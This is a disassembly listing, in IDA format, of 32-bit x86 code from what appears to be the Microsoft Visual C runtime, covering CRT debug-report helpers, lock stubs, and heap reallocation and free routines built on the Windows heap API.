; Attributes: bp-based frame
sub_422760 proc near ; CODE XREF: __CrtDbgReport+113�p
; _CrtMessageWindow+33�p
push ebp
mov ebp, esp
call ds:dword_4F5498 ; DebugBreak
pop ebp
retn
sub_422760 endp
; ---------------------------------------------------------------------------
align 10h
; [00000057 BYTES: COLLAPSED FUNCTION __CrtSetReportMode. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007E BYTES: COLLAPSED FUNCTION __CrtSetReportFile. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, dword_4F3C10
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_4F3C10, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000390 BYTES: COLLAPSED FUNCTION __CrtDbgReport. PRESS KEYPAD "+" TO EXPAND]
; [0000030C BYTES: COLLAPSED FUNCTION _CrtMessageWindow. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007A BYTES: COLLAPSED FUNCTION __close. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AA BYTES: COLLAPSED FUNCTION __close_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000092 BYTES: COLLAPSED FUNCTION __freebuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000044 BYTES: COLLAPSED FUNCTION _fflush. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION __fflush_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B7 BYTES: COLLAPSED FUNCTION __flush. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000F BYTES: COLLAPSED FUNCTION __flushall. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000013F BYTES: COLLAPSED FUNCTION _flsall. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000030 BYTES: COLLAPSED FUNCTION _set_new_handler(int (*)(uint)). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, dword_4F3588
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [0000002D BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000037 BYTES: COLLAPSED FUNCTION __mtinitlocks. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000009F BYTES: COLLAPSED FUNCTION __mtdeletelocks. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000097 BYTES: COLLAPSED FUNCTION __lock. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000016 BYTES: COLLAPSED FUNCTION __unlock. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001C BYTES: COLLAPSED FUNCTION __lockerr_exit. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_4: ; Microsoft VisualC 2-8/net runtime
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call __local_unwind2
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __malloc_base. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION __nh_malloc_base. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000065 BYTES: COLLAPSED FUNCTION __heap_alloc_base. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_423785. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000077 BYTES: COLLAPSED CHUNK OF FUNCTION __heap_alloc_base. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_423807 proc near ; CODE XREF: __heap_alloc_base+E0�p
; DATA XREF: .rdata:0043D05C�o
push 9
call __unlock
add esp, 4
retn
sub_423807 endp
; ---------------------------------------------------------------------------
; [0000005B BYTES: COLLAPSED CHUNK OF FUNCTION __heap_alloc_base. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000A BYTES: COLLAPSED FUNCTION unknown_libname_5. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423880 proc near ; CODE XREF: _realloc_help+2D4�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0042392C SIZE 000000EE BYTES
; FUNCTION CHUNK AT 00423A25 SIZE 00000068 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D060
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0FFFFFFE0h
jbe short loc_4238B0
xor eax, eax
jmp loc_423A7C
; ---------------------------------------------------------------------------
loc_4238B0: ; CODE XREF: sub_423880+27�j
cmp dword_4F3BEC, 3
jnz loc_423968
push 9
call __lock
add esp, 4
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
push eax
call ___sbh_find_block
add esp, 4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_423913
mov [ebp+var_1C], 0
mov ecx, [ebp+arg_4]
cmp ecx, dword_4F3C0C
ja short loc_423913
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_20]
push ecx
call ___sbh_resize_block
add esp, 0Ch
test eax, eax
jz short loc_423913
mov edx, [ebp+arg_0]
mov [ebp+var_1C], edx
loc_423913: ; CODE XREF: sub_423880+61�j
; sub_423880+73�j ...
mov [ebp+var_4], 0FFFFFFFFh
call sub_423921
jmp short loc_42392C
sub_423880 endp
; =============== S U B R O U T I N E =======================================
sub_423921 proc near ; CODE XREF: sub_423880+9A�p
; DATA XREF: .rdata:0043D068�o
push 9
call __unlock
add esp, 4
retn
sub_423921 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423880
loc_42392C: ; CODE XREF: sub_423880+9F�j
cmp [ebp+var_20], 0
jnz short loc_423963
cmp [ebp+arg_4], 0
jnz short loc_42393F
mov [ebp+arg_4], 1
loc_42393F: ; CODE XREF: sub_423880+B6�j
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
push 10h
mov eax, dword_4F3BE8
push eax
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_423963: ; CODE XREF: sub_423880+B0�j
jmp loc_423A79
; ---------------------------------------------------------------------------
loc_423968: ; CODE XREF: sub_423880+37�j
cmp dword_4F3BEC, 2
jnz loc_423A46
cmp [ebp+arg_4], 0
jnz short loc_423982
mov [ebp+arg_4], 1
loc_423982: ; CODE XREF: sub_423880+F9�j
mov ecx, [ebp+arg_4]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+arg_4], ecx
push 9
call __lock
add esp, 4
mov [ebp+var_4], 1
lea edx, [ebp+var_24]
push edx
lea eax, [ebp+var_2C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ___sbh_find_block_0
add esp, 0Ch
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_423A0C
mov [ebp+var_1C], 0
mov edx, [ebp+arg_4]
cmp edx, dword_453CEC
ja short loc_4239F3
mov eax, [ebp+arg_4]
shr eax, 4
push eax
mov ecx, [ebp+var_28]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_2C]
push eax
call ___sbh_resize_block_0
add esp, 10h
test eax, eax
jz short loc_4239F3
mov ecx, [ebp+arg_0]
mov [ebp+var_1C], ecx
loc_4239F3: ; CODE XREF: sub_423880+14C�j
; sub_423880+16B�j
push 0FFFFFFFFh
mov edx, [ebp+var_1C]
mov [ebp+var_30], edx
lea eax, [ebp+var_10]
push eax
call __local_unwind2
add esp, 8
mov eax, [ebp+var_30]
jmp short loc_423A7C
; ---------------------------------------------------------------------------
loc_423A0C: ; CODE XREF: sub_423880+13A�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_423A1A
jmp short loc_423A25
; END OF FUNCTION CHUNK FOR sub_423880
; =============== S U B R O U T I N E =======================================
sub_423A1A proc near ; CODE XREF: sub_423880+193�p
; DATA XREF: .rdata:0043D074�o
push 9
call __unlock
add esp, 4
retn
sub_423A1A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423880
loc_423A25: ; CODE XREF: sub_423880+198�j
cmp [ebp+var_28], 0
jnz short loc_423A44
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
push 10h
mov eax, dword_4F3BE8
push eax
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_423A44: ; CODE XREF: sub_423880+1A9�j
jmp short loc_423A79
; ---------------------------------------------------------------------------
loc_423A46: ; CODE XREF: sub_423880+EF�j
cmp [ebp+arg_4], 0
jnz short loc_423A53
mov [ebp+arg_4], 1
loc_423A53: ; CODE XREF: sub_423880+1CA�j
mov ecx, [ebp+arg_4]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
push 10h
mov ecx, dword_4F3BE8
push ecx
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_423A79: ; CODE XREF: sub_423880:loc_423963�j
; sub_423880:loc_423A44�j
mov eax, [ebp+var_1C]
loc_423A7C: ; CODE XREF: sub_423880+2B�j
; sub_423880+18A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_423880
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_423A90(void *Src,int)
sub_423A90 proc near ; CODE XREF: _realloc_help+2AF�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
Size = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Dst = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00423C63 SIZE 0000020C BYTES
; FUNCTION CHUNK AT 00423E7A SIZE 000000A9 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D078
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFC8h
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
cmp [ebp+Src], 0
jnz short loc_423AD0
mov ecx, [ebp+arg_4]
push ecx
call __malloc_base
add esp, 4
jmp loc_423F12
; ---------------------------------------------------------------------------
loc_423AD0: ; CODE XREF: sub_423A90+2D�j
cmp [ebp+arg_4], 0
jnz short loc_423AE9
mov edx, [ebp+Src]
push edx
call sub_423F30
add esp, 4
xor eax, eax
jmp loc_423F12
; ---------------------------------------------------------------------------
loc_423AE9: ; CODE XREF: sub_423A90+44�j
cmp dword_4F3BEC, 3
jnz loc_423CCF
loc_423AF6: ; CODE XREF: sub_423A90:loc_423CCA�j
mov [ebp+Dst], 0
cmp [ebp+arg_4], 0FFFFFFE0h
ja loc_423C9C
push 9
call __lock
add esp, 4
mov [ebp+var_4], 0
mov eax, [ebp+Src]
push eax
call ___sbh_find_block
add esp, 4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_423C4A
mov ecx, [ebp+arg_4]
cmp ecx, dword_4F3C0C
ja loc_423BCA
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+Src]
push eax
mov ecx, [ebp+var_28]
push ecx
call ___sbh_resize_block
add esp, 0Ch
test eax, eax
jz short loc_423B60
mov edx, [ebp+Src]
mov [ebp+Dst], edx
jmp short loc_423BCA
; ---------------------------------------------------------------------------
loc_423B60: ; CODE XREF: sub_423A90+C6�j
mov eax, [ebp+arg_4]
push eax
call ___sbh_alloc_block
add esp, 4
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jz short loc_423BCA
mov ecx, [ebp+Src]
mov edx, [ecx-4]
sub edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
cmp eax, [ebp+arg_4]
jnb short loc_423B91
mov ecx, [ebp+var_20]
mov [ebp+Size], ecx
jmp short loc_423B97
; ---------------------------------------------------------------------------
loc_423B91: ; CODE XREF: sub_423A90+F7�j
mov edx, [ebp+arg_4]
mov [ebp+Size], edx
loc_423B97: ; CODE XREF: sub_423A90+FF�j
mov eax, [ebp+Size]
push eax ; Size
mov ecx, [ebp+Src]
push ecx ; Src
mov edx, [ebp+Dst]
push edx ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+Src]
push eax
call ___sbh_find_block
add esp, 4
mov [ebp+var_28], eax
mov ecx, [ebp+Src]
push ecx
mov edx, [ebp+var_28]
push edx
call sub_424410
add esp, 8
loc_423BCA: ; CODE XREF: sub_423A90+AA�j
; sub_423A90+CE�j ...
cmp [ebp+Dst], 0
jnz short loc_423C4A
cmp [ebp+arg_4], 0
jnz short loc_423BDD
mov [ebp+arg_4], 1
loc_423BDD: ; CODE XREF: sub_423A90+144�j
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
push ecx
push 0
mov edx, dword_4F3BE8
push edx
call ds:dword_4F5418 ; RtlAllocateHeap
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jz short loc_423C4A
mov eax, [ebp+Src]
mov ecx, [eax-4]
sub ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+var_20]
cmp edx, [ebp+arg_4]
jnb short loc_423C20
mov eax, [ebp+var_20]
mov [ebp+var_40], eax
jmp short loc_423C26
; ---------------------------------------------------------------------------
loc_423C20: ; CODE XREF: sub_423A90+186�j
mov ecx, [ebp+arg_4]
mov [ebp+var_40], ecx
loc_423C26: ; CODE XREF: sub_423A90+18E�j
mov edx, [ebp+var_40]
push edx ; Size
mov eax, [ebp+Src]
push eax ; Src
mov ecx, [ebp+Dst]
push ecx ; Dst
call _memcpy
add esp, 0Ch
mov edx, [ebp+Src]
push edx
mov eax, [ebp+var_28]
push eax
call sub_424410
add esp, 8
loc_423C4A: ; CODE XREF: sub_423A90+9B�j
; sub_423A90+13E�j ...
mov [ebp+var_4], 0FFFFFFFFh
call sub_423C58
jmp short loc_423C63
sub_423A90 endp
; =============== S U B R O U T I N E =======================================
sub_423C58 proc near ; CODE XREF: sub_423A90+1C1�p
; DATA XREF: .rdata:0043D080�o
push 9
call __unlock
add esp, 4
retn
sub_423C58 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A90
loc_423C63: ; CODE XREF: sub_423A90+1C6�j
cmp [ebp+var_28], 0
jnz short loc_423C9C
cmp [ebp+arg_4], 0
jnz short loc_423C76
mov [ebp+arg_4], 1
loc_423C76: ; CODE XREF: sub_423A90+1DD�j
mov ecx, [ebp+arg_4]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+Src]
push eax
push 0
mov ecx, dword_4F3BE8
push ecx
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+Dst], eax
loc_423C9C: ; CODE XREF: sub_423A90+71�j
; sub_423A90+1D7�j
cmp [ebp+Dst], 0
jnz short loc_423CAB
cmp dword_4F3584, 0
jnz short loc_423CB3
loc_423CAB: ; CODE XREF: sub_423A90+210�j
mov eax, [ebp+Dst]
jmp loc_423F12
; ---------------------------------------------------------------------------
loc_423CB3: ; CODE XREF: sub_423A90+219�j
mov edx, [ebp+arg_4]
push edx
call __callnewh
add esp, 4
test eax, eax
jnz short loc_423CCA
xor eax, eax
jmp loc_423F12
; ---------------------------------------------------------------------------
loc_423CCA: ; CODE XREF: sub_423A90+231�j
jmp loc_423AF6
; ---------------------------------------------------------------------------
loc_423CCF: ; CODE XREF: sub_423A90+60�j
cmp dword_4F3BEC, 2
jnz loc_423EAA
cmp [ebp+arg_4], 0FFFFFFE0h
ja short loc_423CFC
cmp [ebp+arg_4], 0
jbe short loc_423CF5
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
jmp short loc_423CFC
; ---------------------------------------------------------------------------
loc_423CF5: ; CODE XREF: sub_423A90+256�j
mov [ebp+arg_4], 10h
loc_423CFC: ; CODE XREF: sub_423A90+250�j
; sub_423A90+263�j ...
mov [ebp+Dst], 0
cmp [ebp+arg_4], 0FFFFFFE0h
ja loc_423E7A
push 9
call __lock
add esp, 4
mov [ebp+var_4], 1
lea ecx, [ebp+var_2C]
push ecx
lea edx, [ebp+var_38]
push edx
mov eax, [ebp+Src]
push eax
call ___sbh_find_block_0
add esp, 0Ch
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jz loc_423E47
mov ecx, [ebp+arg_4]
cmp ecx, dword_453CEC
jnb loc_423DD8
mov edx, [ebp+arg_4]
shr edx, 4
push edx
mov eax, [ebp+var_30]
push eax
mov ecx, [ebp+var_2C]
push ecx
mov edx, [ebp+var_38]
push edx
call ___sbh_resize_block_0
add esp, 10h
test eax, eax
jz short loc_423D75
mov eax, [ebp+Src]
mov [ebp+Dst], eax
jmp short loc_423DD8
; ---------------------------------------------------------------------------
loc_423D75: ; CODE XREF: sub_423A90+2DB�j
mov ecx, [ebp+arg_4]
shr ecx, 4
push ecx
call ___sbh_alloc_block_0
add esp, 4
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jz short loc_423DD8
mov edx, [ebp+var_30]
xor eax, eax
mov al, [edx]
shl eax, 4
mov [ebp+var_34], eax
mov ecx, [ebp+var_34]
cmp ecx, [ebp+arg_4]
jnb short loc_423DAA
mov edx, [ebp+var_34]
mov [ebp+var_44], edx
jmp short loc_423DB0
; ---------------------------------------------------------------------------
loc_423DAA: ; CODE XREF: sub_423A90+310�j
mov eax, [ebp+arg_4]
mov [ebp+var_44], eax
loc_423DB0: ; CODE XREF: sub_423A90+318�j
mov ecx, [ebp+var_44]
push ecx ; Size
mov edx, [ebp+Src]
push edx ; Src
mov eax, [ebp+Dst]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_38]
push eax
call ___sbh_free_block
add esp, 0Ch
loc_423DD8: ; CODE XREF: sub_423A90+2B8�j
; sub_423A90+2E3�j ...
cmp [ebp+Dst], 0
jnz short loc_423E45
mov ecx, [ebp+arg_4]
push ecx
push 0
mov edx, dword_4F3BE8
push edx
call ds:dword_4F5418 ; RtlAllocateHeap
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jz short loc_423E45
mov eax, [ebp+var_30]
xor ecx, ecx
mov cl, [eax]
shl ecx, 4
mov [ebp+var_34], ecx
mov edx, [ebp+var_34]
cmp edx, [ebp+arg_4]
jnb short loc_423E17
mov eax, [ebp+var_34]
mov [ebp+var_48], eax
jmp short loc_423E1D
; ---------------------------------------------------------------------------
loc_423E17: ; CODE XREF: sub_423A90+37D�j
mov ecx, [ebp+arg_4]
mov [ebp+var_48], ecx
loc_423E1D: ; CODE XREF: sub_423A90+385�j
mov edx, [ebp+var_48]
push edx ; Size
mov eax, [ebp+Src]
push eax ; Src
mov ecx, [ebp+Dst]
push ecx ; Dst
call _memcpy
add esp, 0Ch
mov edx, [ebp+var_30]
push edx
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_38]
push ecx
call ___sbh_free_block
add esp, 0Ch
loc_423E45: ; CODE XREF: sub_423A90+34C�j
; sub_423A90+368�j
jmp short loc_423E61
; ---------------------------------------------------------------------------
loc_423E47: ; CODE XREF: sub_423A90+2A9�j
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+Src]
push eax
push 0
mov ecx, dword_4F3BE8
push ecx
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+Dst], eax
loc_423E61: ; CODE XREF: sub_423A90:loc_423E45�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_423E6F
jmp short loc_423E7A
; END OF FUNCTION CHUNK FOR sub_423A90
; =============== S U B R O U T I N E =======================================
sub_423E6F proc near ; CODE XREF: sub_423A90+3D8�p
; DATA XREF: .rdata:0043D08C�o
push 9
call __unlock
add esp, 4
retn
sub_423E6F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A90
loc_423E7A: ; CODE XREF: sub_423A90+277�j
; sub_423A90+3DD�j
cmp [ebp+Dst], 0
jnz short loc_423E89
cmp dword_4F3584, 0
jnz short loc_423E91
loc_423E89: ; CODE XREF: sub_423A90+3EE�j
mov eax, [ebp+Dst]
jmp loc_423F12
; ---------------------------------------------------------------------------
loc_423E91: ; CODE XREF: sub_423A90+3F7�j
mov edx, [ebp+arg_4]
push edx
call __callnewh
add esp, 4
test eax, eax
jnz short loc_423EA5
xor eax, eax
jmp short loc_423F12
; ---------------------------------------------------------------------------
loc_423EA5: ; CODE XREF: sub_423A90+40F�j
jmp loc_423CFC
; ---------------------------------------------------------------------------
loc_423EAA: ; CODE XREF: sub_423A90+246�j
; sub_423A90:loc_423F10�j
mov [ebp+Dst], 0
cmp [ebp+arg_4], 0FFFFFFE0h
ja short loc_423EE8
cmp [ebp+arg_4], 0
jnz short loc_423EC4
mov [ebp+arg_4], 1
loc_423EC4: ; CODE XREF: sub_423A90+42B�j
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+Src]
push edx
push 0
mov eax, dword_4F3BE8
push eax
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+Dst], eax
loc_423EE8: ; CODE XREF: sub_423A90+425�j
cmp [ebp+Dst], 0
jnz short loc_423EF7
cmp dword_4F3584, 0
jnz short loc_423EFC
loc_423EF7: ; CODE XREF: sub_423A90+45C�j
mov eax, [ebp+Dst]
jmp short loc_423F12
; ---------------------------------------------------------------------------
loc_423EFC: ; CODE XREF: sub_423A90+465�j
mov ecx, [ebp+arg_4]
push ecx
call __callnewh
add esp, 4
test eax, eax
jnz short loc_423F10
xor eax, eax
jmp short loc_423F12
; ---------------------------------------------------------------------------
loc_423F10: ; CODE XREF: sub_423A90+47A�j
jmp short loc_423EAA
; ---------------------------------------------------------------------------
loc_423F12: ; CODE XREF: sub_423A90+3B�j
; sub_423A90+54�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_423A90
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423F30 proc near ; CODE XREF: sub_41CCE0+26E�p
; sub_41CCE0+3B2�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00423FB6 SIZE 00000077 BYTES
; FUNCTION CHUNK AT 00424038 SIZE 0000003E BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D090
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE8h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_423F5E
jmp loc_424065
; ---------------------------------------------------------------------------
loc_423F5E: ; CODE XREF: sub_423F30+27�j
cmp dword_4F3BEC, 3
jnz short loc_423FD4
push 9
call __lock
add esp, 4
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
push eax
call ___sbh_find_block
add esp, 4
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_423F9D
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_1C]
push edx
call sub_424410
add esp, 8
loc_423F9D: ; CODE XREF: sub_423F30+5B�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_423FAB
jmp short loc_423FB6
sub_423F30 endp
; =============== S U B R O U T I N E =======================================
sub_423FAB proc near ; CODE XREF: sub_423F30+74�p
; DATA XREF: .rdata:0043D098�o
push 9
call __unlock
add esp, 4
retn
sub_423FAB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F30
loc_423FB6: ; CODE XREF: sub_423F30+79�j
cmp [ebp+var_1C], 0
jnz short loc_423FCF
mov eax, [ebp+arg_0]
push eax
push 0
mov ecx, dword_4F3BE8
push ecx
call ds:dword_4F5414 ; RtlFreeHeap
loc_423FCF: ; CODE XREF: sub_423F30+8A�j
jmp loc_424065
; ---------------------------------------------------------------------------
loc_423FD4: ; CODE XREF: sub_423F30+35�j
cmp dword_4F3BEC, 2
jnz short loc_424052
push 9
call __lock
add esp, 4
mov [ebp+var_4], 1
lea edx, [ebp+var_20]
push edx
lea eax, [ebp+var_28]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ___sbh_find_block_0
add esp, 0Ch
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_42401F
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_20]
push eax
mov ecx, [ebp+var_28]
push ecx
call ___sbh_free_block
add esp, 0Ch
loc_42401F: ; CODE XREF: sub_423F30+D9�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_42402D
jmp short loc_424038
; END OF FUNCTION CHUNK FOR sub_423F30
; =============== S U B R O U T I N E =======================================
sub_42402D proc near ; CODE XREF: sub_423F30+F6�p
; DATA XREF: .rdata:0043D0A4�o
push 9
call __unlock
add esp, 4
retn
sub_42402D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F30
loc_424038: ; CODE XREF: sub_423F30+FB�j
cmp [ebp+var_24], 0
jnz short loc_424050
mov edx, [ebp+arg_0]
push edx
push 0
mov eax, dword_4F3BE8
push eax
call ds:dword_4F5414 ; RtlFreeHeap
loc_424050: ; CODE XREF: sub_423F30+10C�j
jmp short loc_424065
; ---------------------------------------------------------------------------
loc_424052: ; CODE XREF: sub_423F30+AB�j
mov ecx, [ebp+arg_0]
push ecx
push 0
mov edx, dword_4F3BE8
push edx
call ds:dword_4F5414 ; RtlFreeHeap
loc_424065: ; CODE XREF: sub_423F30+29�j
; sub_423F30:loc_423FCF�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_423F30
; ---------------------------------------------------------------------------
align 10h
; [00000062 BYTES: COLLAPSED FUNCTION unknown_libname_6. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_4240E2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000003A BYTES: COLLAPSED CHUNK OF FUNCTION unknown_libname_6. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_424127 proc near ; CODE XREF: unknown_libname_6+A0�p
; DATA XREF: .rdata:0043D0BC�o
push 9
call __unlock
add esp, 4
retn
sub_424127 endp
; ---------------------------------------------------------------------------
; [00000052 BYTES: COLLAPSED CHUNK OF FUNCTION unknown_libname_6. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
call unknown_libname_6 ; Microsoft VisualC 2-8/net runtime
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
cmp dword_4F3BEC, 3
jnz short loc_4241B3
mov eax, dword_4F3C0C
jmp short loc_4241C5
; ---------------------------------------------------------------------------
loc_4241B3: ; CODE XREF: .text:004241AA�j
cmp dword_4F3BEC, 2
jnz short loc_4241C3
mov eax, dword_453CEC
jmp short loc_4241C5
; ---------------------------------------------------------------------------
loc_4241C3: ; CODE XREF: .text:004241BA�j
xor eax, eax
loc_4241C5: ; CODE XREF: .text:004241B1�j
; .text:004241C1�j
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_4F3BEC, 3
jnz short loc_4241FF
cmp dword ptr [ebp+8], 3F8h
ja short loc_4241F8
mov eax, [ebp+8]
mov dword_4F3C0C, eax
mov eax, 1
jmp loc_4242D6
; ---------------------------------------------------------------------------
loc_4241F8: ; CODE XREF: .text:004241E4�j
xor eax, eax
jmp loc_4242D6
; ---------------------------------------------------------------------------
loc_4241FF: ; CODE XREF: .text:004241DB�j
cmp dword_4F3BEC, 2
jnz short loc_424237
mov ecx, [ebp+8]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+8], ecx
cmp dword ptr [ebp+8], 780h
